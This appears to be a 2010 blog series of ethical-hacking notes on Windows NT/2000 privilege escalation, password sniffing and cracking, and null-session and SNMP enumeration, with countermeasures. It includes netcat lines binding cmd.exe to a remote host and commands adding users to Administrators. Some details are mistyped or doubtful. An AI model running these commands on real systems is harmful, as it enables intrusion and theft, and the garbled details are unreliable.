Saturday, February 27, 2010

Access to the network using non-admin user account

                                                                   Privilege Escalation


If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.


This is called privilege escalation
Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the used account to that having increased privileges - such as that of an administrator. For example, if the attacker has access to a W2K SP1 server, he can run a tool such as ERunAs2X.exe to escalate his privileges to that of SYSTEM by using "nc.exe -1-p 50000 -d -e cmd.exe". Note this can also be used remotely.
For instance the named pipes prediction flaw in Windows 2000 allows interactively logged on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next Named Pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. By instructing the SCM to start an arbitrary service that runs as a highly privilege, (such as Clip Book which runs as SYSTEM) the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrator's group. The attacker can conclude his privilege escalation by logging out and then logging in.


Countermeasure  General privilege escalation countermeasures include restricting interactive logons and access to systems programs that users do not require such as cmd.exe, auditing account logon events success, failure; privilege use success, failure and system events success, failure.


                                                               Tool: GetAdmin


GetAdmin.exe is a small program that adds a user to the local administrators group.


It uses low-level NT kernel routine to set a globalflag allowing access to any running process.


You need to logon to the server console to execute the program.


The GetAdmin.exe is run from the command line or from a browser.


This only works with Nt 4.0 Service pack 3.


On an NT machine GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that will add the specified user to the administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the rights to "Debug Programs" will always be able to run the program successfully. This is possible because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and ideally should be only granted to fully trusted users.


Similarly, if Getadmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. Getadmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read only. Therefore the only way to use GetAdmin to modify a domain account database is to log on a primary domain controller and run the utility locally on the PDC.
                                                                      Tool: hk.exe


The hk.exe utility exposes a Local Procedure Call flaw in NT.


A non-admin user can be escalated to administrators group using hk.exe


C:\>net localgroup administrators peter /add Access Denied ------------------------------------------------ c:\>hk net localgroup administrators peter /add lsass pid & tid are: 47 -48 NtImpersonateClientOfPort succeeded


hk.exe takes advantage of the vulnerability in the API call to NT_Impersonate and allows the user to get the token of a kernel thread (LSASS or equivalent). The tool is a command line executable, and the user needs to just key in hk followed by any command he would want to run if he had NT Authority/System level privileges. Note that this is above the Administrator account privileges.


nc -1-p 23 nc -d -e cmd.exe 192.168.xx.xx 23 (Done on the active netcat running on the webserver) hk2 nc -d -e cmd.exe 192.168.xx.xx 23 lsass pid & tid are: 50 - 53


The NtImpersonateClientOfPort succeeds because of the nature by which port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients. Instead, it uses the original handle it got from the NtCreatePort call.
..................................................................................................................................................................... .....................................................
..................................................................................................................................................................... .....................................................
..................................................................................................................................................................... .................................................. 

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?
Most networks use the broadcast technology; which means that every message emanating from any computer on the network can be captured by every other computer on the network. Normally, the message is not taken by other computers as the intended recipient's mac address does not match their mac address. Therefore, all the computers except the recipient of the message will notice that the message is not meant for them, and ignore it. However, if a system has a sniffer program running on it, it can scan all the messages which traverse the network looking for passwords and other sensitive information. For instance, if a user logs into a computer across the network, and the attacker's system is running a sniffer program, the attacker can sniff out the login information such as user name and its corresponding password. This will make it easy for the attacker to login to the target system as an authentic user and compromise it further. This technique is called password sniffing.
This is a serious threat to users — such as remote users - who login to computers from remote sites. Therefore, the password security of a remote user is as good as the network he/she uses to access the remote computer.
                                                              Hacking Tool: LOphtcrack
•LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions.
•With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days.
Windows operating systems based on the LAN Manager networking protocols use an authentication system that consists of transmitting a hashed twenty four byte password across the network from client to server in a challenge/response format. The hashed password from the client is compared with the hash of the same password in the server's database. A match results in authentication. However, the problem lay in the weak hash algorithm and the conversion of the hash into uppercase (thereby eliminating case sensitivity). The algorithm divided the password into seven-character segments and hashed then individually. This allowed the attacker to restrict the password cracking to seven letters and also easier. The weakness of the password hash, coupled with the transmission of the hash across the network in the challenge/response format, made LM-based systems highly susceptible to password interception and brute-force attack by LOphtcrack.

In Windows NT however, case sensitivity was included to strengthen the password, but coupling LM authentication with the NTLM authentication scheme to facilitate backward compatibility with LAN Manager-based systems, resulted in both hashes being sent across the network for authentication and being stored in the password databases. This resulted in LOphtcrack capturing and cracking the much simpler LM password and then applying the results of that broken hash to the NTLM hash to determine any differences.

                                                           Hacking Tool: KerbCrack
•KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.
KerbCrack demonstrates the possibility of obtaining user passwords by simply listening to the initial Kerberos logon exchange. Let us explore how this can also be vulnerable to brute force attacks.
In general, encryption protocols such as Kerberos can be circumvented under the following four scenarios:
•The attacker is able to steal the encrypted key — by any means possible.
•The attacker finds a flaw in the implementation of the protocol - attributable to the vendor.
•The attacker finds a flaw in the protocol itself — which is highly unlikely.
•The attacker tries all possible keys in a brute-force approach. This is a possibility.

Password guessing Countermeasures

Password guessing Countermeasures
•Block access to TCP and UDP ports 135–139.
•Disable bindings to Wins client on any adapter.
•Use complex passwords
•Log failed logon attempts in Event viewer - Security log full event 529 or 539 - Logon/Logoff
Monitoring Event Viewer Logs
•Logging is of no use if no one ever analyzes the logs
•VisualLast from http://www.foundstone.com/ formats the event logs visually
VisualLast is considered as the advanced version of NTLast with a number of additional and sophisticated features. The program is designed to allow network administrators to view and report individual users log on and log off times and these events can be searched by time frames. This is an invaluable feature to security analysts looking for intrusion details.

Administrator Password Guessing

Administrator Password Guessing


•Assuming that NetBIOS TCP139 port is open, the most effective method of breaking into NT/2000 is password guessing.
•Attempting to connect to an enumerated share (IPC$, or C$) and trying username/password.
•Default Admin$, C$, %Systemdrive% shares are good starting point.
One common security lapse seen is to leave in the built-in Administrator account with a null password. Password guessing appeals to the attacker because complicated passwords are difficult to remember and hence users tend to choose easiest password possible. It is often seen that users choose something that is easy to remember like birthday, pet's name, kid's name etc. Examples of these common user/password combinations can be downloaded all over the Internet.
One can categorize password guessing attacks by the amount of interaction they require with an authentication system. They are considered to be on-line attacks when the perpetrator must make use of an authentication system to check each guess of a password. On the other hand, offline attacks sees an attacker obtaining information (e.g. password hash) that will allow him to check password guesses on his own, without any further access to the system. On-line attacks are generally considered slower than off-line ones.
Automated password attacks can be divided into two basic categories, dictionary attacks and brute force attacks.
•A simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as LophtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is.
•The brute force method is the most inclusive - though slow. Usually, it tries every possible letter and number combination in its automated exploration.
•A hybrid approach is one which combines features of both the methods mentioned above. It usually starts with a dictionary and then tries combinations such as two words together or a word and numbers.
Legion automates the locating and connecting of Windows-based shares. The software depends on the user not protecting their shares with passwords before connecting to the Internet. The software also has a brute-force password cracking plug-in that can be used to find passwords for shares that are protected.
Legion polls wide range of IP addresses to check for availability of shared folders. The application broadcasts a NetBIOS request across the LAN to find all computers that have NetBIOS services. The application then searches each polled computer for available shares, and displays the results. Once these shares are known, there is little to do on the administrator's part to detect or deter brute force password guessing. The commercial version of Legion has an option to brute force crack any shares that were identified as shared, but password protected. The vulnerable system can have its drive mapped to the attacker's system and he can use this point of access for further nefarious activities such as installing Trojans, stealing information and even corrupting the system - thereby resulting in a denial of service. The most obvious countermeasure is to make sure that File and Print Sharing is disabled. If this is required, it must be password protected and allowed only to specific IP addresses because DNS names can be spoofed. The system must also restrict null sessions.
NTInfoScan is a security scanner for NT 4.0 is a vulnerability scanner that produces an HTML based report of security issues found on the target system and further information.
NTInfoScan (now Cerberus internet scanner) is a vulnerability scanner designed by David Litchfield specifically to address the security concerns of Windows NT 4.0 operating system. It still works with Windows 2000 and The HTML based report highlights the security issues found on the target system along with further information. It tests a number of services such as ftp, telnet, web service, for security problems. Added to this NTInfoScan will check NetBIOS for share security and User account security.

Friday, February 26, 2010

Enumeration Tools

Hacking Tool: Enum

Enum is a console-based Win32 information enumeration utility.
Using null sessions, enum can retrieve user lists, machine lists, share lists, name lists, group and membership lists, password and LSA policy information.
enum is also capable of rudimentary brute force dictionary attack on individual accounts.
enum is a tool written by Jordan Fitter to enumerate, using null and user sessions, Win NT/2000 information. enum is a console-based Win32 information enumeration utility. Using null sessions, enum can retrieve userlists, machine lists, sharelists, namelists, group and member lists, password and LSA policy information. enum is also capable of a rudimentary brute force dictionary attack on individual accounts.

Hacking tool: Userinfo

•Userinfo is a little function that retrieves all available information about any known user from any NT/Win2k system that you can hit 139 on.
•Specifically calling the NetUserGetInfo API call at Level 3, Userinfo returns standard info like
◦SID and Primary group
◦logon restrictions and smart card requirements
◦special group information
◦pw expiration information and pw age
•This application works as a null user, even if the RA set to 1 to specifically deny anonymous enumeration.

Hacking Tool: GetAcct

GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000 machines. Input the IP address or NetBIOS name of a target computer in the "Remote Computer" column. Input the number of 1000 or more in the "End of RID" column. The RID is user's relative identifier by which the Security Account Manager gives it when the user is created. Therefore, it is input as 1100, if there are 100 users.
GetAcct shows the information that leaks by opening an anonymous login and showing the following information:
◦An enumeration of user IDs,
◦account names and full names
◦Password age
◦User groups the user is a member of
◦Account type
◦Whether the account is disabled or locked
◦Password policies
◦Last logon time, Number of logons
◦Bad password count
◦Quotas


SNMP Enumeration Countermeasures

Countermeasure Do not install the management and monitoring windows component if it is not going to be used. In case it is required ensure that only legally authorized persons have access to it else, it might turn into an obvious backdoor. Edit the Registry to permit only approved access to the SNMP community Name.
Countermeasure Change 'community' to properly configured ones - preferably with private community names (not the default "public"). Where possible, restrict access to SNMP agent. By restriction, we mean allowing SNMP requests from only specific addresses. Additionally, these requests should be restricted to read-only wherever possible. All these configurations can be done by changing the properties of the 'SNMP Service' (Start/Administrative Tools/Services).
Countermeasure Authenticate/Encrypt using IPSEC - SNMP (V1) may not have adequate authentication and encryption facilities built in but this is where IPSec can come to the rescue. IPSec policies can be defined in the monitored systems and management stations so that all SNMP traffic is authenticated and/or encrypted.
Coutermeasure Collect Traps - If SNMP is enabled, monitor the Windows 2000 event logs. Effective auditing can actually raise the level of security

Saturday, February 6, 2010

Identifying Accounts


Two powerful NT/2000 enumeration tools are:
sid2user
user2sid
They can be downloaded at (www.chem.msu.su/^rudnyi/NT/)
These are command line tools that look up NT SIDs from username input and vice versa.


user2sid and sid2user are two small utilities for Windows NT/2000 that allows the user to query SAM and to find out a SID value for a given account name and vice versa. These utilities are actually command line interfaces to WIN32 functions, LookupAccountName and LookupAccountSid. It happens that to use these functions a user have just to be EVERYONE. It means that an ordinary user can find without a problem a built-in domain administrator name, which MS recommends us to rename from administrator to something else.
User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and more. Windows NT/2000 keeps track of User accounts and groups with Security Identifiers or SIDs. All SIDs are unique within a given system and are issued by what is known as an "Authority" such as a domain. There are five authorities:
SECURITY_NULL_SID_AUTHORITY (null user)
SECURITY_WORLD_SID_AUTHORITY (everyone)
SECURITY_LOCAL_SID_AUTHORITY (local user)
SECURITY_CREATOR_SID_AUTHORITY (creator owner /group)
SECURITY_NT_AUTHORITY
Note the default SIDs that captures a cracker's interest.


Administrator S-1-5-21-<........................>-500 and Guest S-1-5-21-<........................>-501


Domain Admins S-1-5-21-<........................>-512


Domain Users S-1-5-21-<........................>-513

Domain Guest S-1-5-21-<........................>-514
Let us take a look at the attack.
Here we try for the default built-in Administrator account - and we get access to more information such as domain and number of sub authorities.
Had we found the default guest account, we could escalate it to the Administrators group by changing the RID using the sid2user.
c:\>sid2user \\196.xxx.xxx.xx 5 21 1123561549 1788223846 725345447 500
This will change the guest account to that of an administrator account. The last three digits (here 500) is the registered ID. Once a RID has been issued it will never be used again. Any group or user that is not created by default will have a RID of 1000 or greater.
Net use, user2sid and sid2user all operate over TCP port 139 - NetBIOS session. The reason why these utilities work despite having ACLs in place is that LookupAccountName and LookupAccountSID don't have ACL on them.

SNMP Enumeration

SNMP is simple. Managers send requests to agents, and the agents send back replies. The requests and replies refer to variables accessible to agent software.
Managers can also send requests to set values for certain variables.
Traps let the manager know that something significant has happened at the agent's end of things:
---a reboot
---an interface failure,
---or that something else that is potentially bad has happened.
Enumerating NT users via SNMP protocol is easy using snmputil
SNMP consists primarily of two objects: a manager and an agent. An agent consists of a piece of software embedded in a machine. SNMP agents exist for almost any piece of equipment. However, the installed agent doesn't do anything for the machine until queried by the manager. This is separate program that a network manager runs on their own computer that queries the agent (across the network) for information.
The default community string that provides the monitoring or read capability is often "public". The default management or write community string is often "private". The SNMP exploit takes advantage of these default community strings to allow an attacker to gain information about a device using the read community string "public", and the attacker can change a systems configuration using the write community string "private".
SNMPutil example


The security threat comes from Windows 2000 servers and workstations having SNMP support enabled and failing to change the default read-only community string 'Public'. However, changing this does not exempt it from attackers sniffing it from the network or to subjecting it to a dictionary or brute force attack. This may not seem troublesome but the Windows 2000 SNMP variables contain a wealth of information for the sniffing cracker. Some of the tables that are available when one has READ access to the SNMP tree in a Windows 2000 box are listed below:
Interface Table - This table identifies all boxes with multiple interfaces, plus useful details like their IP and MAC addresses.
Route Table and ARP Table - With access to these tables, a cracker can quickly build an accurate picture of a network and continue its search for vulnerabilities.
TCP Table and UDP Table - These will show which TCP and UDP ports are actively used, and on which ports services are listening for new clients.
Device Table and Storage Table - Knowing what hardware is attached to a Windows 2000 machine gives crackers clues about what kind of machine it is dealing with.
Process Table and Software Table - Knowing what software are installed and what software is running (DNS server, DHCP server) gives away details about how to attack the system. They even show which service packs have been installed (and missing patches)
User Table - Knowing which user names are valid on a machine makes it much easier to guess passwords and gain access to a system.
Share Table - If the cracker knows what shares are exported and used by a Windows machine, it can lead to a serious security compromise.
Here, we will look at an SNMP utility called SNMPutil.exe which is a part of the Windows 2000 resource kit. Let us take a look at what we can discover with it from the command line prompt.
In this output, the variable is called 1.3.6.1.2.1.1.2.0, and we 'get' its value, which turns out to be 1. The variable name (1.3.6.1.2.1.1.2.0) is called an object identifier or OID. An alternative to this is found in the second line of the output shown here. The 'interfaces.ifNumber.o' is the same OID, but is more easily readable. The second and third arguments to SNMPUTIL designate the host to which the SNMP request will be sent (210.212.69.129), and community (authentication string or password) to use (public). The 'public' community is the default when SNMP support is installed on a Windows 2000 host, and it allows the user to read all variables present. Since even the number of interfaces in a host is sensitive data, the threat is evident. Let us look at some of the other variables that might be of interest to an attacker and a security professional.
IpForwarding (1.3.6.1.2.1.4.1.0) - Is the host forwarding? This is not a good sign for a workstation.
IcmpInRedirects (1.3.6.1.2.1.5.7) - Is the host redirecting icmp messages?
TcpOutRsts (1.3.6.1.2.1.6.15) - A counter indicating the number of RSTs send by the box. This counter will increase rapidly when port-scanned.
UdpNoPorts (1.3.6.1.2.1.7.2) - A counter indicating traffic to ports where no service was present. Also a possible port-scan signal.
SNMP walk automates the whole process of getting the variables and can be redirected to an output file. To summarize, Snmputil can reveal details about services that are running, share names, share paths, any comments on shares, usernames and domain names etc.
SNMP Enumeration Countermeasures
Simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service.
If shutting off SNMP is not an option, then change the default 'public' community name.
Implement the Group Policy security option called Additional restrictions for anonymous connections.
Access to null session pipes and null session shares, and IPSec filtering should also be restricted.